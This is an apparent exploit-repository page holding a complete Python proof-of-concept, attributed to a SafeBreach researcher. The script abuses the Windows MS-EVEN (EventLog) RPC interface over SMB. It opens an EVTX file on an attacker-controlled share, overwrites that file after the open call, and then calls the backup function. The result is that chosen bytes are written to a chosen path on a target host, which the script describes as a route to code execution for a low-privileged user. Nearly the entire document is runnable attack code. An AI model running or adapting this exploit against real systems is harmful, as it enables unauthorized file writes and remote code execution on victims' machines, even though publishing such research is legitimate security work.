# 4837 Total CVEs
# 26 Years
# GitHub
# README.md
# Rendering markdown...
# POC / write_file_remotely.py PY
"""
@Author: Yarin A.
@Company: SafeBreach
@Description:   This script uses the write primitive provided by MS-EVEN
                in order to execute code over SMB as a low-privileged user.
"""

import os
import shutil
import argparse

from impacket.dcerpc.v5 import even
from impacket.dcerpc.v5.dtypes import RPC_UNICODE_STRING
from impacket.dcerpc.v5.transport import DCERPCTransportFactory


class Attacker:
    """Client for the MS-EVEN (EventLog) RPC interface over an SMB named pipe.

    Constructing an instance connects to the ``eventlog`` pipe on the given
    host, authenticates with the supplied credentials and binds the MS-EVEN
    interface. ``upload_file`` then drives the open-backup / backup call pair,
    and ``close_connection`` tears the DCE/RPC session down.
    """

    # Format applied to every console message printed by log().
    LOG_MSG_TEMPLATE = r"[+] - {message}"
    # impacket string binding for the eventlog named pipe on the target.
    EVENT_LOG_NCACN = r"ncacn_np:{ip}[\pipe\eventlog]"
    # Value handed to set_auth_level() in __init__.
    RPC_C_AUTHN_LEVEL_PKT_INTEGRITY = 5
    # Not referenced by any method visible in this class.
    SAMPLE_EVTX_FILENAME = r"Sample.evtx"
    # Name given to the working copy of the EVTX file.
    TEMP_EVTX_FILE_TEMPLATE = r"Temp_{valid_evtx_file}"
    # UNC path under which the working copy is referenced in the RPC call.
    SHARE_PATH = r"\\{smb_server_ip}\Share\{local_file_path}"

    def __init__(self, ip, username, password, smb_server_ip):
        """Connect, authenticate and bind the MS-EVEN interface.

        Args:
            ip: Address of the host whose ``eventlog`` pipe is opened.
            username: Account name used for authentication.
            password: Password for ``username``.
            smb_server_ip: Address substituted into ``SHARE_PATH`` when the
                UNC path of the working EVTX copy is built.
        """
        self.smb_server_ip = smb_server_ip

        self.log("Initializing Connection...")
        self.connection = DCERPCTransportFactory(self.EVENT_LOG_NCACN.format(ip=ip))

        self.log("Authenticating...")
        self.connection.set_credentials(username, password)
        self.connection.connect()

        self.dce = self.connection.get_dce_rpc()
        self.dce.set_auth_level(self.RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)
        self.dce.connect()

        self.log("Binding MS-EVEN Interface...")
        self.dce.bind(even.MSRPC_UUID_EVEN)

    def create_rpc_unicode_string(self, regular_string):
        """Wrap ``regular_string`` in an ``RPC_UNICODE_STRING`` structure.

        Args:
            regular_string: Text to place in the structure's ``Data`` field.

        Returns:
            The populated ``RPC_UNICODE_STRING``.
        """
        crafted_unicode_string = RPC_UNICODE_STRING()
        crafted_unicode_string["Data"] = regular_string
        # NOTE(review): MaximumLength is bumped by one after Data is assigned;
        # presumably to satisfy the server's length validation - confirm.
        crafted_unicode_string.fields["MaximumLength"] += 1
        return crafted_unicode_string

    def create_target_evtx(self, src):
        """Copy ``src`` to ``Temp_<basename of src>`` and return that name.

        The destination is a bare file name, so the copy is created in the
        current working directory.

        Args:
            src: Path of the EVTX file to copy.

        Returns:
            The file name of the copy.
        """
        file_name = os.path.basename(src)
        dest_name = self.TEMP_EVTX_FILE_TEMPLATE.format(valid_evtx_file=file_name)
        shutil.copy(src, dest_name)
        return dest_name

    def cleanup(self, file_path):
        """Delete ``file_path`` if it exists; do nothing otherwise."""
        if os.path.exists(file_path):
            os.remove(file_path)

    def upload_file(self, local_file_path, remote_file_path, valid_evtx_file_path):
        """Run the open-backup / backup sequence for one file.

        Steps, in order:
            1. Copy ``valid_evtx_file_path`` to a working copy.
            2. Open that copy through its UNC share path with
               ``hElfrOpenBELW``.
            3. Overwrite the working copy from offset 0 with the contents of
               ``local_file_path`` followed by a single null byte.
            4. Call ``hElfrBackupELFW`` with the returned handle and
               ``remote_file_path``.

        Args:
            local_file_path: Local file whose bytes are written into the
                working copy.
            remote_file_path: Path passed to ``hElfrBackupELFW`` as the
                backup destination.
            valid_evtx_file_path: Local EVTX file used as the initial content
                of the working copy.
        """
        temp_valid_evtx_file = self.create_target_evtx(valid_evtx_file_path)

        file_path_in_share = self.SHARE_PATH.format(
            smb_server_ip=self.smb_server_ip,
            local_file_path=os.path.basename(temp_valid_evtx_file),
        )
        unicode_valid_evtx_share_path = self.create_rpc_unicode_string(
            file_path_in_share
        )
        unicode_remote_path = self.create_rpc_unicode_string(remote_file_path)

        self.log("Starting upload to {0}".format(remote_file_path))

        # Read the payload through a context manager so the descriptor is
        # released immediately instead of waiting for garbage collection.
        with open(local_file_path, "rb") as local_file:
            local_file_path_data = local_file.read()

        with open(temp_valid_evtx_file, "rb+") as valid_evtx_file:
            handle = even.hElfrOpenBELW(self.dce, unicode_valid_evtx_share_path)

            # The working copy is rewritten only after the open call returned.
            valid_evtx_file.seek(0)
            valid_evtx_file.write(local_file_path_data + b"\x00")
            valid_evtx_file.flush()
            even.hElfrBackupELFW(self.dce, handle["LogHandle"], unicode_remote_path)

        self.log("Done!")

    def close_connection(self):
        """Disconnect the DCE/RPC session opened in ``__init__``."""
        self.log("Disconnecting...")
        self.dce.disconnect()

    def log(self, message):
        """Print ``message`` to stdout using ``LOG_MSG_TEMPLATE``."""
        print(self.LOG_MSG_TEMPLATE.format(message=message))


def main():
    """Parse the command line, perform one upload and always disconnect.

    All seven arguments are positional and required, in this order:
    ``ip_to_attack``, ``smb_server_ip``, ``username``, ``password``,
    ``valid_evtx_file_path``, ``local_file_path``, ``remote_file_path``.
    """
    parser = argparse.ArgumentParser()

    parser.add_argument("ip_to_attack")
    parser.add_argument("smb_server_ip")
    parser.add_argument("username")
    parser.add_argument("password")
    parser.add_argument("valid_evtx_file_path")
    parser.add_argument("local_file_path")
    parser.add_argument("remote_file_path")

    args = parser.parse_args()

    attacker = Attacker(
        args.ip_to_attack,
        username=args.username,
        password=args.password,
        smb_server_ip=args.smb_server_ip,
    )

    # Disconnect even when the upload raises, so the RPC session opened by
    # the constructor is not left dangling.
    try:
        attacker.upload_file(
            local_file_path=args.local_file_path,
            remote_file_path=args.remote_file_path,
            valid_evtx_file_path=args.valid_evtx_file_path,
        )
    finally:
        attacker.close_connection()


# Run main() only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()